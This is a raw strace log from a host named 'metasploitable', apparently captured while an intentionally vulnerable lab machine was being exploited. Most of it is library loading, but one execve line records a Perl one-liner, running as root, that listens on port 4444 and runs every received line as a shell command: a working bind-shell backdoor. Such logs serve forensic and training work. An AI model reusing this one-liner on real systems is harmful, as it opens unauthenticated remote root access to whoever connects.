8350  07:23:03.128277 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

8350  07:23:03.128291 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

8350  07:23:03.128381 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

8350  07:23:03.128398 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dcf000

8350  07:23:03.128410 mmap2(0xb7dd8000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dd8000

8350  07:23:03.128425 close(1)          = 0

8350  07:23:03.128473 munmap(0xb7f8a000, 29913) = 0

8350  07:23:03.128505 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

8350  07:23:03.128519 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

8350  07:23:03.128531 _llseek(1, 0, [0], SEEK_CUR) = 0

8350  07:23:03.128543 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

8350  07:23:03.128559 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f91000

8350  07:23:03.128570 _llseek(1, 1624, [1624], SEEK_SET) = 0

8350  07:23:03.128585 munmap(0xb7f91000, 1624) = 0

8350  07:23:03.128595 close(1)          = 0

8350  07:23:03.128624 getpgrp()         = 3831

8350  07:23:03.128634 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

8350  07:23:03.128649 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

8350  07:23:03.128665 brk(0x8101000)    = 0x8101000

8350  07:23:03.128696 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.128711 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.128726 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

8350  07:23:03.128763 brk(0x8102000)    = 0x8102000

8350  07:23:03.128789 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8350  07:23:03.128809 stat64("/sbin/AB", 0xbfa9e8f8) = -1 ENOENT (No such file or directory)

8350  07:23:03.128822 stat64("/bin/AB", 0xbfa9e8f8) = -1 ENOENT (No such file or directory)

8350  07:23:03.128833 stat64("/usr/sbin/AB", 0xbfa9e8f8) = -1 ENOENT (No such file or directory)

8350  07:23:03.128845 stat64("/usr/bin/AB", 0xbfa9e8f8) = -1 ENOENT (No such file or directory)

8350  07:23:03.128862 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

8350  07:23:03.128877 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e056f8) = 8351

8351  07:23:03.128922 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8351  07:23:03.128940 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

8351  07:23:03.128962 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

8351  07:23:03.128979 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

8351  07:23:03.129013 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8351  07:23:03.129034 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8351  07:23:03.129052 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

8351  07:23:03.129124 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

8351  07:23:03.129146 --- SIGPIPE (Broken pipe) @ 0 (0) ---

8351  07:23:03.129231 exit_group(127)   = ?

8350  07:23:03.167641 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:23:03.167670 waitpid(8350,  <unfinished ...>

8350  07:23:03.167681 <... rt_sigprocmask resumed> NULL, 8) = 0

8350  07:23:03.167702 --- SIGCHLD (Child exited) @ 0 (0) ---

8350  07:23:03.167716 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 8351

8350  07:23:03.167734 waitpid(-1, 0xbfa9e578, WNOHANG) = -1 ECHILD (No child processes)

8350  07:23:03.167745 sigreturn()       = ? (mask now [])

8350  07:23:03.167769 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

8350  07:23:03.167786 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8350  07:23:03.167797 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

8350  07:23:03.167810 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

8350  07:23:03.167828 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8350  07:23:03.167840 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

8350  07:23:03.167877 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

8350  07:23:03.167898 stat64("/sbin/perl", 0xbfa9e928) = -1 ENOENT (No such file or directory)

8350  07:23:03.167911 stat64("/bin/perl", 0xbfa9e928) = -1 ENOENT (No such file or directory)

8350  07:23:03.167923 stat64("/usr/sbin/perl", 0xbfa9e928) = -1 ENOENT (No such file or directory)

8350  07:23:03.167935 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

8350  07:23:03.167953 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

8350  07:23:03.167979 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

8350  07:23:03.167994 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e056f8) = 8352

8352  07:23:03.168046 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

8352  07:23:03.168090 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

8352  07:23:03.168105 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

8352  07:23:03.168132 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

8352  07:23:03.168148 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

8352  07:23:03.168163 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

8352  07:23:03.168176 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

8352  07:23:03.168212 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

8352  07:23:03.168305 brk(0)            = 0x8153000

8352  07:23:03.168326 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.168342 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f72000

8352  07:23:03.168358 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.168376 open("/etc/ld.so.cache", O_RDONLY) = 1

8352  07:23:03.168388 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

8352  07:23:03.168406 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f6a000

8352  07:23:03.168416 close(1)          = 0

8352  07:23:03.176925 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.176925 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

8352  07:23:03.176925 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

8352  07:23:03.176926 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

8352  07:23:03.176926 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f66000

8352  07:23:03.176937 mmap2(0xb7f68000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f68000

8352  07:23:03.176955 close(1)          = 0

8352  07:23:03.176968 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.176982 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

8352  07:23:03.176996 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

8352  07:23:03.177085 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

8352  07:23:03.177103 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f41000

8352  07:23:03.177144 mmap2(0xb7f64000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f64000

8352  07:23:03.177179 close(1)          = 0

8352  07:23:03.177192 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.177206 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

8352  07:23:03.177220 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

8352  07:23:03.177313 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

8352  07:23:03.177330 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f40000

8352  07:23:03.177343 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f28000

8352  07:23:03.177354 mmap2(0xb7f3c000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f3c000

8352  07:23:03.177369 mmap2(0xb7f3e000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f3e000

8352  07:23:03.177383 close(1)          = 0

8352  07:23:03.177394 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.177407 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

8352  07:23:03.177422 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

8352  07:23:03.177511 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

8352  07:23:03.177529 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dd9000

8352  07:23:03.177540 mmap2(0xb7f22000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f22000

8352  07:23:03.177555 mmap2(0xb7f25000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f25000

8352  07:23:03.177568 close(1)          = 0

8352  07:23:03.177581 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

8352  07:23:03.177594 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

8352  07:23:03.177627 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

8352  07:23:03.177748 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

8352  07:23:03.177766 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7da7000

8352  07:23:03.177777 mmap2(0xb7db0000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7db0000

8352  07:23:03.177792 mmap2(0xb7db2000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7db2000

8352  07:23:03.177806 close(1)          = 0

8352  07:23:03.177831 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7da6000

8352  07:23:03.177844 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7da68c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

8352  07:23:03.177904 mprotect(0xb7f22000, 4096, PROT_READ) = 0

8352  07:23:03.177931 munmap(0xb7f6a000, 29913) = 0

8352  07:23:03.177945 set_tid_address(0xb7da6908) = 8352

8352  07:23:03.177954 set_robust_list(0xb7da6910, 0xc) = 0

8352  07:23:03.177964 futex(0xbf88ed30, 0x81 /* FUTEX_??? */, 1) = 0

8352  07:23:03.177979 rt_sigaction(SIGRTMIN, {0xb7f2c2c0, [], SA_SIGINFO}, NULL, 8) = 0

8352  07:23:03.177992 rt_sigaction(SIGRT_1, {0xb7f2c340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

8352  07:23:03.178005 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

8352  07:23:03.178019 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

8352  07:23:03.178038 uname({sys="Linux", node="metasploitable", ...}) = 0

8352  07:23:03.178085 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

8352  07:23:03.178133 brk(0)            = 0x8153000

8352  07:23:03.178172 brk(0x8174000)    = 0x8174000

8352  07:23:03.178231 getuid32()        = 0

8352  07:23:03.178241 geteuid32()       = 0

8352  07:23:03.178250 getgid32()        = 0

8352  07:23:03.178259 getegid32()       = 0

8352  07:23:03.178297 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d85000

8352  07:23:03.178325 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

8352  07:23:03.178343 read(1, ",\"\326\245", 4) = 4

8352  07:23:03.178360 close(1)          = 0

8352  07:23:03.178378 time(NULL)        = 1495624983

8352  07:23:03.178421 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbf88ea00) = -1 ENOENT (No such file or directory)

8352  07:23:03.178438 stat64("/usr/local/lib/site_perl/5.8.8", 0xbf88ea00) = -1 ENOENT (No such file or directory)

8352  07:23:03.178451 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbf88ea00) = -1 ENOENT (No such file or directory)

8352  07:23:03.178467 stat64("/usr/local/lib/perl/5.8.7", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178480 stat64("/usr/local/share/perl/5.8.7", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178492 stat64("/usr/local/lib/perl/5.8.6", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178504 stat64("/usr/local/share/perl/5.8.6", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178516 stat64("/usr/local/lib/perl/5.8.4", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178528 stat64("/usr/local/share/perl/5.8.4", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178539 stat64("/usr/local/lib/perl/5.8.3", 0xbf88eb40) = -1 ENOENT (No such file or directory)

8352  07:23:03.178551 stat64("/usr/local/share/perl/5.8.3", 0xbf88eb40) = -1 ENOENT (No such file or directory)

